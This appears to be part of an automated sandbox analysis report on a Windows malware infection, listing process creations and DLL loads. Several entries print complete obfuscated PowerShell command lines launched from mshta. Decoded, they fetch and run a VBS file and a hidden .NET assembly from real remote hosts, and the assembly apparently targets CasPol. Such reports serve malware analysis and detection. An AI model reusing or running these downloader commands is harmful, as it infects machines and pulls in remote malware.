                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENtJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
